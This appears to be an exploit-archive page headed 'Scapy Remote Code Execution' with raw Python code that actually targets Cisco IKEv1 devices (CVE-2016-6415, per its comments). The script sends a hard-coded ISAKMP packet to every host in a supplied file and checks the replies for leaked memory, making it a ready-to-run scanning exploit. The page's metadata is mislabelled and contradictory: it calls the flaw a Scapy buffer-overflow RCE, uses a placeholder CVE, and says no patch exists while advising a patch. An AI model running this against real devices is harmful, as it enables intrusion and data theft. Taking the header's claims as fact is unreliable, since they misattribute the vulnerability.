Scapy Remote Code Execution

vendor:
Scapy
by:
Unknown
9.8
CVSS
CRITICAL
Remote Code Execution
119
CWE
Product Name: Scapy
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2021-xxxxx
CPE: a:scapy_project:scapy
Metasploit:
Other Scripts:
Platforms Tested:
2021
Scapy Remote Code Execution

The Scapy library in Python is vulnerable to remote code execution due to a buffer overflow vulnerability. By sending a specially crafted payload to a target that is running a vulnerable version of Scapy, an attacker can execute arbitrary code on the target system.
Mitigation:

Update to the latest version of Scapy or apply the available patch.
Source
Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: utf8 -*-

import socket
from scapy.all import *

# ---------------------------
# Requirements:
# $ sudo pip install scapy
# ---------------------------

conf.verb = 0

RCVSIZE = 2548
TIMEOUT = 6

payload = '>5\xc7\x07)\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02'
payload += '\x00\x00\x00\x00\x00\x00\x00\t\xe0\x00\x00\t\xc4\x00\x00\x00\x01'
payload += '\x00\x00\x00\x01\x00\x00\t\xb8\x01\x01\x04\x01.\xbf\x19<\x00\x00'
payload += '\t\xac\x01\x01\x00\x00\x80\x01\x00\x06\x80\x0b\x00\x01\x00\x0c\x00'
payload += '\x04\x00 \xc4\x9b\x80\x02\x00\x02\x80\x04\x00\x01\x00\x06\t\x84'
payload += '\xaf\xe30\x12w\x0b\xe2\xaa\xe1\xe9D\xb3F\x07mZ\x8b'
payload += '\x16N\xc1c\x1f&\x81\xd2\xd5\xa3\x03\x1b\xf6\x83\x04'
payload += '\xa2\xbe\\y\x8e\xd0\xcc\xc1VRWh\xdf"\x0f\xfeXI\xbd#\xfc'
payload += '\x99\xab:\xfa\x04\xbeM\x8a\xc4N\x1d\x9f\xc07m\xfaD\xaf\xc8'
payload += '\xba\xd2\t\xcc.\xff Zw\xcf\xa4K\x92\xea\xf7Hl\x1e&\xc9\xb8R'
payload += '\x1c\xb9\x9b\x8c~\xa2TkZ\t\xf1\n\xb0P/\xc4/c<\x9f\x85\x15'
payload += '@\xfbC\x1d\\\xd8,\x10c\x88\x10p\xe8\x0e\xab\xbd\x95+\x02'
payload += '\xf0X\xaer\x9fY\xa5\xff\xe2T\t\xbe\x86_\xde\x10\x8dB\xe9'
payload += '\x19sZ\x99_e\xa0\xdf$2}^\xb9\xefc\xbd\x18U\xaeA<\xef\xc6'
payload += 'n`\xe8\x8d?\xa7y\xe9\xa3\xc3\xb5\x9a{:\xb9s\x08;X\x0fx\xa0'
payload += '.\x978\x80W\xe9\xd8F\xa6 \xa5\xae\x9bx\x12\xcf\xe4\xcb\xe0'
payload += '\x17\xeeT.\x81~\xb4\x0c\xcf\xcf7\x08\xce{\xd0?\xc57\xcfM>'
payload += '\x99$*\xde\xa2;\xe2\n\xe4\xb8\xeb3B\x06\xb5\xab\xc3A\xe62N'
payload += '\xb4B\xabY\x1a\x08\xa5mb\x91\xda\xd73\x8e\xbd\x07\xea\xf3\xbf'
payload += '\x1c\xce\x89\n{UX\xd5W\x91M\x17\xe7\xa4\xdf~\x9dH\x83\xab\x92'
payload += '\xfciJ\x8e\xe3k\x8a\xd3\xd1*\x81.\x99\x03S;8\xb4SE\xd2.S/\xc5'
payload += '\x87\xa1\x11$\xfd\xa6\xf0\x1e\xfe\x9f\'B\x87\x00Z\x88b"\x1ceq'
payload += '\xdb\t\x81\xb7\xef\xf6\xb3n\xc6 \x83\xa3\xea\x0b;\xba\xe1\x81'
payload += '\x07\x91\xac\x11\x87\x9a\xc08\xd2E\xc2PfA\xadW6\xd3\x12\xebeI'
payload += '\xff\xef\xf0\x834 \x90\xa0\xb1\xf0A\x8d\xec!ZN:\x98\x1a\xecD'
payload += '\xaa\x06.\x17X\xa4M\xaf\xcc\n\xf5\xf2\xc6\xe3-\xedHWY\xac\x12'
payload += 'P\x80\x8a\xf5\xf8\xf7y\xc8\xfe\xa4\x9d\xab\x16O\x8f\xc2\xdfu'
payload += '\x15s\xae\xca[\xd7\xf3/\x88\n_\x17\x82RC\x08l\x97\xb7\xf3\xef'
payload += '\xfd[\xe3P\x1c\xb4\x19\x17\x7f\xc4\xcd$\t1n\xc0l\xeb\xc2~'
payload += '\xd6\xb1\xfcs\xd9\x0c\xfc\x03'
payload += '\x86\xf1\xc4\xef\x90(\x9d\xf04\xd2\x98k\x0fM@k\xf2\xef\x16'
payload += '\xbf8\x81\xe2\xf8k[d\xac\'\x93\x7fnZ\x9dJ\xa8\xbaIM\x1d>'
payload += '\xe6L\xc3\xaeD\x08\xf6\x83\xb8\xc7ao&\x97\x13\xb1\xd3,&\xc9'
payload += '\xc1\xa0\xb5\xbai\xa8qpE\xc7`\x03\x8a$\xb0E\x8e\x8aM\x1a\x07'
payload += '\x9a*\x8a]-\x90\x0c\xd7\xa8+\x8bIbe\xba\tr_Bu\xda\xe5\xd4MrYqN'
payload += '\xdeg"L-@\xc3\nT\x86\xd8C\xc8\n\x03\xec\xab\xfb\xbf\xf3i4'
payload += '\xb0\x85\xa5\x97\xbc\xdeA'
payload += '\xf9\xeb\xb8D\xcfF\x8f\x93[=b\x8d\xba\xeb\xeec\xf8\x99\x02'
payload += 'L#"u\xb1\xc0f\xa4\x11\x9f%\xfc\x8bC\xbcY\x98r\xb7\x880\xa3'
payload += '\n2yl+\x8d\x9a\xff\xf7\x04\x18\xd5\xc1j\xbb\tot\xb7s}\xbb'
payload += '\x10L\xff;\x1c\xf1\xa10\xfa\xc2e7"\xdf\xd3\x9d\xe4\xa9\xfd'
payload += '\xf6A\xee\xb2\xb02=J\xfb\xcf\xebT\xa8\xc0\x1et\x1cz|\xde'
payload += '\x12>\xed\xc3\x93\xeb\xd2{\xf0<\x1c\xff\x8fg\xfb\x8f\xd7'
payload += '#4I\x8dK\xa9iu\xf4\xd0\xb0u\xd2\xb8'
payload += '\x0c\xe6U\xba\xe8\xcc,\x06\xbf\x93q;F;\xae<\x1d][\xba'
payload += '[\x10\x06\x97\x15y\x02\x1f\xe1<\xff Y\xfa\xb2\x0c\xbdb'
payload += '\nm\x81\xb2\x99\xf5\\!\xe63\xa6\x13e\xf3\xa1u\x117n\x8cw'
payload += '\n\x97\x81\xbe\xf5\x82\xcc\xdb\xbf\x0cB\xc9\x08b\xb5\x9dGt'
payload += '\xff\xd0\xbb\xf3\'6\xdbZ!\xe9\x99\xc3\x972i\x98\xf4\xfb\xef'
payload += '\xf7Q\xee\xe8\xa5\xf0\xd4\xa91PLS\xb1-\x0f<~\xc1\xbe\x9d\x85'
payload += '\xe31\x1a\x83,=\xa5\x94\x16\x00tq\xa9f'
payload += '\x05\xcal*\x9f\xd6\xec\xb9&\xc9}\xbd\x84\xdf\xd5\xd9\x10\xbd'
payload += '\x11\xe0|R\xef\x89\x98\x85d3F\x11\xc4D\x12\x02:\xaby\xf5\xcc'
payload += '\xaa\x17\x0b\xffm8\x88\x07Ym\xd0{\xcaE.,t9\x11\xa2\xf2L\x1e'
payload += '\x06\x8aY\x96\\K\x9c\xf87\xd05k\x03\x9c\x00\xda/\xc7\xa3\x10y'
payload += '\x1a\x80\x05\xde\xc8\x06:/\x08\xc3?\x15\xe9\x85\x97V\xb0\x80^'
payload += '\xbeT\x7f\xb7\x08V\x9f:\xfa~\x0bb\xdf\x8236\xfc\xe8\xf8\xb4N'
payload += '\x886\xdc\x94\x952'
payload += '\x12\x97s\xfdn\xee0\x10\xaeg\xc9\xfb\xe0\xf9!\xd6j\x8c\xe2'
payload += '\xbd\xf4\xc21\xca\x89t\x18\x03:\xc7(B!\xcfa\x08\xcc \x8c'
payload += '\x12\xa2\n\xeb\x875\xe2~\xe95\xacA\xa2\xc3\xd6W\x1c\xcf'
payload += '\'o\xacZxv\xac\x88"\xb5w\x02\xae\x8b-\x16-p\xdezd\xbec['
payload += '\xc7n\x12~QA\xc0\xe6\x9dQ\'\xf0\xe0"\xb1::\xfe\xd8$\xd1'
payload += '\x8bSa\x84\x8d\x0c\xd24g\xe3\xfe\x8d\xe4\x01\xd2c\x08\xda'
payload += '`Y 5\n\xf9\x08\xcc#\x80!\x9b\xb4^\xcbu\x02'
payload += '\xd9g\x00\x0f\xbcy\xe1\xf4\xf0OD\x7f\xe4\x96\xe5J\xb6\x14'
payload += '\xa8j\xce\x1b\x06\xf3\x13V-\x07\x9b\xe9,\xe3J\xb8\'\xf0U~'
payload += '\xd2p\xde;}\xf6NY\xfa\'\x8e\x1a\t\xfc\x89\xe3\x07\xdc\x06'
payload += '\xc10\xef\xd61\x03\x05=s\x9b\x90\x1eR\x91\xa8\xb1\xa2\x15)'
payload += '\x9bj=\x881\x03@Ck\xad\x045\x94\n\x83W@\xcdeD\xe1\x8dX\xf2U'
payload += '{\xa2\xd8\xbb\x04ogfE\xe0s\x9az\x08\xf12 \xb9\x06\xeb]\x19'
payload += '\x1aW\xb6ju\x11\x1fn\xdbC\x84\x1e'
payload += '\xea -\xba\x8f\xd0\xa9\t\xf1X\xcd\x13\xe1e\xd4\x98\x93!)xb'
payload += '\xff\xd5\x90\xcfB|\xce\x16"\x0e\x89$L\x9e$\xb1\xf0&\xe7\xe9'
payload += '\x1b\xaa@\xd2K\x97\xc3\xf0\x0b\xed\xd5p\xef\xa8\x04\xa2\x9a&'
payload += '\xc0\x01\x8d\x9d$c\xf7"\xc6u\x18\x030+\xbeC\xce\xab\xc1\xee'
payload += '\x1c\xe2\x11C;\x0b%\xcb\x99\xd1\xbc\xe6;\x86BB\x1a\x98\x02'
payload += '\xe9\xf6P\x98+s\xe9\xd3i\x04!\xdd\xa1\xd1\xc1\xedY\x07\xf0'
payload += '\n\xc4\'\xde:Ai\x9d/\x19p\x91'
payload += '\xc5\\?v}\xdd\x91\x888?\xaa\xc3\x0c\xc6\xcf\xe7\xf3\xc6d'
payload += '\xf4\x08\n\xa4U\xaf\n\x04\xd9/\xec\xcb\xe4\x98\x99\xb7\x1e'
payload += '\xa7/\x85\xdf\xa2M\x89~\x08\xfd\x08\xc7\xf3\xa6\xc0*rK=\xad'
payload += '\xa5\xe6\\\x08)aZq\x97\xbf\xe9\x9b\xd0\tV\x9d\xc2\x19\x92'
payload += '\xf1m\xf8\xdcu\xe2\xe8\xd2\xd7\xdb\xd9{\x0c\xb2\xbd\xed'
payload += '\x1fj\t\xcc&\x9c\x87\x9cs:\xd1\xbe\x88\xdb\x18\xce\x0b'
payload += 'f&\xf6q\xd06n\xe6\xc5Q\xa4i9Bp\x80\xe5$\xc9'
payload += '\xf8-\xe8\xce\xf1q\xd5A\x89\xe41\x8a\xf8\xa5Q\xe2\xf0\xb3'
payload += 'ho-\xfc\x11\x12\x1btD\x190\xc0\x16@>\x0f\x9e\x08rT^\xdf'
payload += '\xd9z6}!\xb3k9\x97y\x97\x9a\xd8\xcd7\x17\xc5\xbd\xe4\xa2'
payload += '=&2\x9f1\xa0\x9f?\x8e\xfb\xf2\x07\ti\xc6\x05\xc9\xfa\xf8M'
payload += '\xa3\xe6\x0e\xaeN\xc5:-\xa4\x8aI\x1bNo\xb5\xedN\x8c\xa9'
payload += '\xda \x18\x8a\x18\xd2(\xc3\x97\x15\xe9]\x9a\x85\xaay\x82'
payload += '0\xa4N=\xb5\xaa0A\x81\xed\xea]A\xa6Pu\x06\x18'
payload += '\x83\x9c\x91\x86\xc6\x90\xc3<\xb6F\n\xe3\xfd\xdf\x0e\x17'
payload += '\x1f$y\xd5\xb6\xb6\x9e{\x00~/L\xae\x10\x9fDo\xbf[KF\xd2*'
payload += '\x90sa)\x92M\x00\x9f\x13\xb8V\x811\xa7\xe17gFRh"@zR=\xf3'
payload += '\x83\x94\x9d_\x83Ax\x01I\xce\x99P\x11\x11@\x8b\xc7\xbc\x94'
payload += 'd\xae\xe3r\xc7]\xc5m\xc7J\xa1\xb7f\xba%\xb9G\xe0+C\xc5\xa2'
payload += '\x9e\xe5p\xb6\x7f\x0b\xa3 L\xa7\xd7\nf\xaa\x19\xe8\xe1&jT'
payload += '\x89\xfcv\t\xd4\n\xec\xf5\x8b\xc9\x04\xb6'
payload += '\x1b\x1c\n\x83\x11=: \xf3\xa7z \x13\xcf\x96\x8a\xb2\x9bk'
payload += '\x04\xb7\x86\xea\x99\x05\x043\xe5_J\xc9bh\xf1\xadE\xe8'
payload += '\x13O\xf4\xfbx\x98\x95\xef\x86B\xac\x0b\xac-\xbb\x82\xfav'
payload += '\xf5\xa1\xbe]B\xa5\xd6\'\xb8]6\xc7\tXW\xc4C\x97\xa2\n\x8c'
payload += '\x02\x89\xc3h`(\x05\x9d_\xb9\xf99\xbf\x1bJ<\x83\x02\xe9'
payload += '\x84\x83\xc7K\x9e\xcf\xaf\xf8r\xd2\xf1!\xc8\x0f\x862'
payload += '\\\x99@OK\xb5TL\x03d\x92\x81\xb5S5+\xec\x0e\x96\x8f'
payload += '\x08\xf6I[PP\xd0\x89\n\xb5\xe5\x17\xbd\x8d\xbd\x86\xd3'
payload += '\nZ\xfa\xc7\xac\xa5\x9d\x7f8\x91\xc8\xcd\x93K\x84\x1d'
payload += '\x03\t\xd8i\xf1Z7i\xb3\x0eQ\xe1<\x1a\xac\xd7\xd5\xc3'
payload += '\x1fv\xd7K\xe9\xa5j\xba\x15\xe9hN]\xb0\xb0\xcf3\x0e'
payload += '\xc6\xd7U\x8d$0a\x8f\xff\xd4X\xdb(%\x06\xbf\x9e\x8c='
payload += '\xf2C\xba\x80J\xbdU8\xafpL\xb8\x9e\xd5\x94\xca\xc9\xf2'
payload += '\xda\x10H\x19\xf2\xcc\xae\x04\xe1t\\1\xbc\xa3\x96\xaa\xd6\x04{\xe8'
payload += '\xca;\xc3\xce\xa2{\xb4\x9b\x15c&\xe6\xe31v\x8f\x9c \xdfj_\xa7'
payload += '\nT\xae\x06m\x8a\xe4\xbb!p\xb5]\xfb\xdf\xa3K\xc7k\xc66\xa7'
payload += '\x19L\xe4\xcc\x99\x04,8*\xbf\xf9\x83\x80`S\xb9\x9d\x1d'
payload += '\xcaI\xca.{\\\x9b\x1e\xb8r\x93\x8b\x08\xf9=*T\x80\xb8a'
payload += '\x9aq(\xf2oq{KCs\xdc\xcdN\x1c\x87\xfalq\xc5\x82\xf8\x89'
payload += '\x13kS\x00\xf3\x9a\xe4\xbaC\xc0\xc2T}\x86\x85l\xe4B\x95'
payload += '\xb7ru\x86\xf5\x1e}j5\xe2\xe9\xfeG\x16\x8c\x1c'
payload += '\x01b\xe9\xd0\xd1\x16\xa4)\xf0\xcb0*W\x9f\x9fT\xf5\x12'
payload += '\xea[\x8b\xdd\xb6+\xf2\x04\x06\x916\xa7\xc6e\x96\x8cx'
payload += '\xe0\xfe\xd4u\x96\xc8c\xe4c\xdd\xca@f\x7fj\xa4\xe7`'
payload += '\xa5\x8b\xff\xe7\xed\x1c\x00w\x18\xbe[\xef\xe4\x1f'
payload += '\xa4?\x8c\x90\x80\x05\xbf\xe4\xd9\x9e\x964\x16\x16'
payload += '\x0b\xf0\xbfn\xd8\xa7_\x9c\nm\xb5DA\xa2\x10Hy\xb5'
payload += '\x82\x88\xa7\xb3&~\x91\xa3?\xd6*\xd9\n;^t\xc3'
payload += '\x1f\x08\xcc\xb1\xc0\x9d}\x9eJ'
payload += '\xe6\x89\xbf\x03h:\x90Y\xfb\xe6R|\x0fInW\xaf'
payload += '\x16\xffz\xd4CL&r\xdd\x15y\xa9Z\xe7p\xbc\xeb'
payload += '\x1b\xf3\x811\xe1V\xc4$?\xe9\xda\x1fj\xa9J\x05\xe3'
payload += '\x96I6\xdaNa\x93\x1e\xac\xd9I\n\x15\x10\xf0\x1f\xbb'
payload += '\x07\x00"\xd3\x94Eth\xa4\xf7gz\xdehu\xce3'
payload += '\xf8\xc0mS\x80\x03\x00\x01'

# print(len(payload))

# cisco - IP/UDP/ISAKMP
def exploit(host, port=500):
    # ikev1_pkt = open("sendpacket.raw").read()
    data = None
    try:
        # print("[+] exploit CVE-2016-6415 - {}:{}".format(host, port))
        client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        # IP/UDP/ISAKMP
        client.sendto(payload, (host, port))
        client.settimeout(TIMEOUT)
        data, addr = client.recvfrom(RCVSIZE)
    except socket.timeout:
        pass
        # print("[*] timeout - {}:{}".format(host, port))

    return data


def is_vulnable(host, port):
    data = exploit(host, port)
    if data:
        isakmp = ISAKMP(data)
        # ls(isakmp)
        if isakmp.haslayer(ISAKMP_payload):
            isakmp_payload = isakmp.getlayer(ISAKMP_payload)
            # leak memory data
            # isakmp_payload.load
            if isakmp_payload.length > 0 and isakmp_payload.load:
                print("[+] exploit {}:{} succesfully".format(host, port))
                return True

    print("[-] exploit {}:{} Failed".format(host, port))
    return False


if __name__ == '__main__':
    import sys
    if len(sys.argv) == 2:
        with open(sys.argv[1]) as f:
            for ip in f:
                is_vulnable(ip.strip(), 500)

# https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
# https://tools.cisco.com/security/center/selectIOSVersion.x
# https://isakmpscan.shadowserver.org/
# https://twitter.com/marcan42/status/766346343405060096
# https://nmap.org/nsedoc/scripts/ike-version.html
# http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415

# [+] ---- Fingerprint: ---- [+]
# cisco pix
# cisco pix 6
# cisco pix 7
#
# 500/udp open  isakmp  udp-response Cisco VPN Concentrator 3000 4.0.7
# Cisco Systems, Inc./VPN 3000 Concentrator Version 4.7.2.L built by vmurphy on Jun 11 2007 14:07:29
# Vendor: Cisco Systems, Inc.
# Cisco Systems, Inc. 12.2
# Cisco Systems, Inc. 12.4
# Cisco Systems, Inc. 15.5
# Cisco Systems pix
# Cisco VPN Concentrator